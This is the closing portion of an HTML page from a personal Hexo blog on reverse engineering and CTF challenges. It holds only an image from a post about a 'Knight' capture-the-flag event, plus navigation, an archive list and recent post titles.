<p><img src="https://s3.bmp.ovh/imgs/2022/01/284e22f5598d00b0.png" alt="genshin"></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://secondbc.github.io/SecondBC/2022/01/26/Knight%E5%A4%BA%E6%97%97%E6%88%98/" data-id="ckyuf3s5f0000novc0bzn0bi1" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/SecondBC/2022/02/19/%E9%80%86%E5%90%91%E5%B7%A5%E7%A8%8B%E6%A0%B8%E5%BF%83%E5%8E%9F%E7%90%86%E5%A4%8D%E7%8E%B002/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          逆向工程核心原理复现02
        
      </div>
    </a>
  
  
    <a href="/SecondBC/2022/01/19/ROP%E5%9F%BA%E7%A1%80%E9%A2%98/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">ROP基础题</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/SecondBC/archives/2022/04/">April 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/SecondBC/archives/2022/03/">March 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/SecondBC/archives/2022/02/">February 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/SecondBC/archives/2022/01/">January 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/SecondBC/archives/2021/12/">December 2021</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/SecondBC/2022/04/23/Shell-Lab/">Shell_Lab</a>
          </li>
        
          <li>
            <a href="/SecondBC/2022/03/31/Angr-Lab/">Angr.Lab</a>
          </li>
        
          <li>
            <a href="/SecondBC/2022/02/24/VM%E5%AE%9E%E9%AA%8C%E5%A4%8D%E7%8E%B0/">VM实验¤复现</a>
          </li>
        
          <li>
            <a href="/SecondBC/2022/02/22/Hgame2022-ReverseWriteUp/">Hgame2022-ReverseWriteUp</a>
          </li>
        
          <li>
            <a href="/SecondBC/2022/02/19/%E9%80%86%E5%90%91%E5%B7%A5%E7%A8%8B%E6%A0%B8%E5%BF%83%E5%8E%9F%E7%90%86%E5%A4%8D%E7%8E%B002/">逆向工程核心原理复现02</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2022 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/SecondBC/" class="mobile-nav-link">Home</a>
  
    <a href="/SecondBC/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/SecondBC/fancybox/jquery.fancybox.css">

  
<script src="/SecondBC/fancybox/jquery.fancybox.pack.js"></script>




<script src="/SecondBC/js/script.js"></script>




  </div>
</body>
</html>